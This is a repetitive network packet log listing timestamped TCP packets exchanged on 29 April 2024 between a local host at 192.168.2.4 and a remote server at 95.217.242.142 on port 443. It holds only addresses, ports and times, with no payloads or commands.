Apr 29, 2024 22:13:09.893412113 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:09.893563986 CEST	49750	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:09.893583059 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:09.893642902 CEST	49750	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:09.905514002 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:09.905529976 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:09.905589104 CEST	49750	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:09.905599117 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:09.905638933 CEST	49750	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:09.916389942 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:09.916407108 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:09.916476011 CEST	49750	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:09.916485071 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:09.916502953 CEST	49750	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:09.916521072 CEST	49750	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:09.926999092 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:09.927014112 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:09.927071095 CEST	49750	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:09.927078962 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:09.927122116 CEST	49750	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:09.937669992 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:09.937685966 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:09.937854052 CEST	49750	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:09.937860966 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:09.937906027 CEST	49750	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:09.946824074 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:09.946839094 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:09.946906090 CEST	49750	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:09.946913958 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:09.946954012 CEST	49750	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:09.956629992 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:09.956645012 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:09.956703901 CEST	49750	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:09.956712008 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:09.956722021 CEST	49750	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:09.956749916 CEST	49750	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:09.986219883 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:09.986237049 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:09.986336946 CEST	49750	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:09.986355066 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:09.986401081 CEST	49750	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:09.990197897 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:09.990214109 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:09.990295887 CEST	49750	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:09.990303040 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:09.990346909 CEST	49750	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:09.994829893 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:09.994846106 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:09.994910955 CEST	49750	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:09.994918108 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:09.994956970 CEST	49750	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:09.998895884 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:09.998914957 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:09.998975039 CEST	49750	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:09.998981953 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:09.999022961 CEST	49750	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:10.003201962 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:10.003218889 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:10.003279924 CEST	49750	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:10.003287077 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:10.003325939 CEST	49750	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:10.007843971 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:10.007862091 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:10.007929087 CEST	49750	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:10.007936001 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:10.007970095 CEST	49750	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:10.011791945 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:10.011811018 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:10.011866093 CEST	49750	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:10.011873960 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:10.011919975 CEST	49750	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:10.015769958 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:10.015784979 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:10.015844107 CEST	49750	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:10.015851021 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:10.015888929 CEST	49750	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:10.024377108 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:10.024391890 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:10.024451971 CEST	49750	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:10.024461031 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:10.024498940 CEST	49750	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:10.032835960 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:10.032857895 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:10.032915115 CEST	49750	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:10.032924891 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:10.032963037 CEST	49750	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:10.039973974 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:10.040002108 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:10.040041924 CEST	49750	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:10.040051937 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:10.040071964 CEST	49750	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:10.040091991 CEST	49750	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:10.047379017 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:10.047394991 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:10.047456026 CEST	49750	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:10.047468901 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:10.047514915 CEST	49750	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:10.053294897 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:10.053313017 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:10.053392887 CEST	49750	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:10.053401947 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:10.053447008 CEST	49750	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:10.062158108 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:10.062175035 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:10.062232971 CEST	49750	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:10.062241077 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:10.062280893 CEST	49750	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:10.074090958 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:10.074110031 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:10.074163914 CEST	49750	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:10.074172020 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:10.074213028 CEST	49750	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:10.078809023 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:10.078825951 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:10.078886032 CEST	49750	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:10.078892946 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:10.078929901 CEST	49750	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:10.083137989 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:10.083154917 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:10.083211899 CEST	49750	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:10.083219051 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:10.083260059 CEST	49750	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:10.088123083 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:10.088140965 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:10.088200092 CEST	49750	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:10.088207960 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:10.088277102 CEST	49750	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:10.094705105 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:10.094719887 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:10.094795942 CEST	49750	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:10.094803095 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:10.094842911 CEST	49750	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:10.101042986 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:10.101063013 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:10.101151943 CEST	49750	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:10.101162910 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:10.101207018 CEST	49750	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:10.107671976 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:10.107690096 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:10.107733965 CEST	49750	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:10.107743025 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:10.107757092 CEST	49750	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:10.107789040 CEST	49750	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:10.112986088 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:10.113003016 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:10.113075018 CEST	49750	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:10.113082886 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:10.113128901 CEST	49750	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:10.121536970 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:10.121556044 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:10.121635914 CEST	49750	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:10.121644974 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:10.121687889 CEST	49750	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:10.125864029 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:10.125880957 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:10.125931978 CEST	49750	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:10.125940084 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:10.125968933 CEST	49750	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:10.125987053 CEST	49750	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:10.131994009 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:10.132010937 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:10.132067919 CEST	49750	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:10.132076025 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:10.132152081 CEST	49750	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:10.137088060 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:10.137105942 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:10.137176991 CEST	49750	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:10.137185097 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:10.137207985 CEST	49750	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:10.137228966 CEST	49750	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:10.141817093 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:10.141834021 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:10.141896009 CEST	49750	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:10.141902924 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:10.141926050 CEST	49750	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:10.141946077 CEST	49750	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:10.146754980 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:10.146771908 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:10.146831989 CEST	49750	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:10.146838903 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:10.146889925 CEST	49750	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:10.146917105 CEST	49750	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:10.153523922 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:10.153539896 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:10.153616905 CEST	49750	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:10.153630018 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:10.153666973 CEST	49750	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:10.159837008 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:10.159854889 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:10.159915924 CEST	49750	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:10.159923077 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:10.159948111 CEST	49750	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:10.159966946 CEST	49750	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:10.164067984 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:10.164086103 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:10.164128065 CEST	49750	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:10.164134979 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:10.164155960 CEST	49750	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:10.164172888 CEST	49750	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:10.169528008 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:10.169548035 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:10.169593096 CEST	49750	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:10.169600010 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:10.169635057 CEST	49750	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:10.169732094 CEST	49750	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:10.173753977 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:10.173773050 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:10.173844099 CEST	49750	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:10.173856020 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:10.173897982 CEST	49750	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:10.178142071 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:10.178158998 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:10.178199053 CEST	49750	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:10.178205967 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:10.178242922 CEST	49750	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:10.178261995 CEST	49750	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:10.183744907 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:10.183760881 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:10.183809996 CEST	49750	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:10.183818102 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:10.183834076 CEST	49750	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:10.183860064 CEST	49750	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:10.190041065 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:10.190056086 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:10.190120935 CEST	49750	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:10.190129042 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:10.190197945 CEST	49750	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:10.217787027 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:10.217803001 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:10.217869997 CEST	49750	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:10.217880011 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:10.217921972 CEST	49750	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:10.221659899 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:10.221674919 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:10.221735001 CEST	49750	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:10.221741915 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:10.221770048 CEST	49750	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:10.221793890 CEST	49750	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:10.226351023 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:10.226365089 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:10.226443052 CEST	49750	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:10.226449966 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:10.226494074 CEST	49750	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:10.230292082 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:10.230308056 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:10.230381012 CEST	49750	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:10.230393887 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:10.230438948 CEST	49750	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:10.234566927 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:10.234581947 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:10.234643936 CEST	49750	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:10.234651089 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:10.234693050 CEST	49750	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:10.238231897 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:10.238246918 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:10.238318920 CEST	49750	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:10.238327026 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:10.238388062 CEST	49750	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:10.242815018 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:10.242830038 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:10.242902994 CEST	49750	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:10.242909908 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:10.242954016 CEST	49750	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:10.251420021 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:10.251434088 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:10.251507998 CEST	49750	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:10.251514912 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:10.251558065 CEST	49750	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:10.251960993 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:10.251976013 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:10.252027988 CEST	49750	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:10.252034903 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:10.252058029 CEST	49750	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:10.252078056 CEST	49750	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:10.254237890 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:10.254252911 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:10.254324913 CEST	49750	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:10.254329920 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:10.254367113 CEST	49750	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:10.257693052 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:10.257708073 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:10.257787943 CEST	49750	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:10.257796049 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:10.257838964 CEST	49750	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:10.261048079 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:10.261068106 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:10.261142015 CEST	49750	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:10.261148930 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:10.261195898 CEST	49750	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:10.264345884 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:10.264363050 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:10.264441967 CEST	49750	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:10.264450073 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:10.264493942 CEST	49750	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:10.268405914 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:10.268421888 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:10.268496037 CEST	49750	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:10.268503904 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:10.268546104 CEST	49750	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:10.271802902 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:10.271820068 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:10.271882057 CEST	49750	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:10.271888971 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:10.271929979 CEST	49750	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:10.275091887 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:10.275109053 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:10.275161028 CEST	49750	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:10.275167942 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:10.275207996 CEST	49750	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:10.278949022 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:10.278975010 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:10.279026985 CEST	49750	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:10.279033899 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:10.279046059 CEST	49750	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:10.279067039 CEST	49750	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:10.282157898 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:10.282174110 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:10.282242060 CEST	49750	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:10.282249928 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:10.282293081 CEST	49750	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:10.285207987 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:10.285229921 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:10.285276890 CEST	49750	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:10.285290956 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:10.285307884 CEST	49750	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:10.285321951 CEST	49750	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:10.288335085 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:10.288352013 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:10.288422108 CEST	49750	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:10.288434982 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:10.288479090 CEST	49750	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:10.292200089 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:10.292224884 CEST	443	49750	95.217.242.142	192.168.2.4
